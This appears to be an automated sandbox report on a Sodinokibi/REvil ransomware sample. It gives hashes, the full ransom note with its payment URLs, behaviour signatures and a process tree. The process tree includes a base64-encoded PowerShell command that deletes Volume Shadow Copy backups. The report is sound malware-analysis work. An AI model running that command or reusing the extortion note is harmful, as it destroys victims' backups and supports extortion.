Analysis

  • max time kernel
    126s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:45

General

  • Target

    ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe

  • Size

    165KB

  • MD5

    6edc8e537c6cf38e56fcf2af79980344

  • SHA1

    024bf6e1cd3084bb453b1826f350e853b1951727

  • SHA256

    ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1

  • SHA512

    5e3cead37cd53c3003f68dd5c4fe87b30d7edefba3ab48a86e2efb2704060b74008011ff0157df26fd161ad411ddae0296f83cfb5a6affc10e7856285121f518

Malware Config

Extracted

Path

C:\vp3bu-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion vp3bu. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BD8DF666A5CED4FA 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/BD8DF666A5CED4FA Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: M9hTd4xcCeSQf4paGjxcMTtSADuzQIgJ6kHptrssukb9NMN99DTqA6In/lX4FQs4 PUl0LaW+gvnaR0jyyiBFe3kY8CaG8Au9Kdo5DxYX7TAfdsjkfZDIIzYrRctv9M/J ESBVzsBxnOOKfoO4rZTJjTwsb/rmlZT9cw3P7YjmL+fM63yNrZMl6DALwrA2wX2F pV3A2AO9Xda9DcmNwaIDEYRBGLtTZTyjE3tKY4rr52UtjqAI0fyT9KXxlHJhEdtp eSde/MdapEyyj4dtZM49D+OqbFxdwErnyyAFOzHqEOiDwFvpXsZsToGqnir09OXS +2F03220ZfBu+cpVcdpoah0vH2av7E25uQ0LJDkRT0jSbDxVHuyxLFbd63TcD3LW 9p+5eVcUvqVq+D3sjDINfy3+nBhIMBtpRCN/ptTxHk5Zg17idQrz/6FBdHFvh384 6NOKaAGjpfBsK5SOMDXDV/tlI+vRYPYAaXF4bNWW477liRX10NLY2xlCBU+qOREw JPh9WkLbtGliPBaJ3ky+9UNxMD076I+CxNV3/mVczyCAxsDx3bSlsQKUnMTAreFs TqK+OFtvAwJDW5NkjSO4zliS/xiN8FfqXwlGO4MBy8DWEMMgxb2t/csKIm8khX1s /5g6wbxPwu6/A25B0sCMZPPgh0p/LXJMKkCP19pvxgVmuxH6jYDtcydr9XJPBDll EPKH1JOUyseJ2WC63OV6HR95GFeIE0cqBN1ykl5FqR9rbT5wC5/rSTPM7Lc71YJE 97x6zluF0JX3YoMuR+BIPrTyESRdWMuiwocK8CVVOAIvUdvT0Gt9mSryGMRtLN13 u//S0okS7AGyt3HgmJ7KgtMgwa4uYI7cB8JCajcWLBZFN7SjF4Ua29OaUnOBE/zX QDJ+kRBOn8XgXrYI2bGGlQ2cdfQ+xoO/EaKnOP0IPxex2XuzGuTJL9NnzXuh0F/R y64RdwV5J85oq25Dnv9b92oOfXfHf2iPaE8UqP6+HHaBrX4dLGGEX4lNccMMKd61 VKIvTb4WlB/rqf/1a1IIYJ+IG/PxevnzJNUec3ZJiaNN4TaaGWUdR9X8co8smzFq lcbtZIQCga/YlknlN/k3bkPyn3Irxm8/p85QYcux/c9gJTwTpsh4VOj01al9bm8F Extension name: vp3bu ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BD8DF666A5CED4FA

http://decryptor.cc/BD8DF666A5CED4FA

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 28 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 22 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe
    "C:\Users\Admin\AppData\Local\Temp\ec9950b2114f7c13c3395c6d5f0ecaa520a0dfe62b1e33c56c746ceec97881e1.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:564
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1392
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1044

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/564-55-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp
      Filesize

      8KB

    • memory/564-57-0x0000000002820000-0x0000000002822000-memory.dmp
      Filesize

      8KB

    • memory/564-58-0x0000000002822000-0x0000000002824000-memory.dmp
      Filesize

      8KB

    • memory/564-59-0x0000000002824000-0x0000000002827000-memory.dmp
      Filesize

      12KB

    • memory/564-56-0x000007FEF31E0000-0x000007FEF3D3D000-memory.dmp
      Filesize

      11.4MB

    • memory/564-60-0x000000000282B000-0x000000000284A000-memory.dmp
      Filesize

      124KB

    • memory/1096-54-0x0000000076121000-0x0000000076123000-memory.dmp
      Filesize

      8KB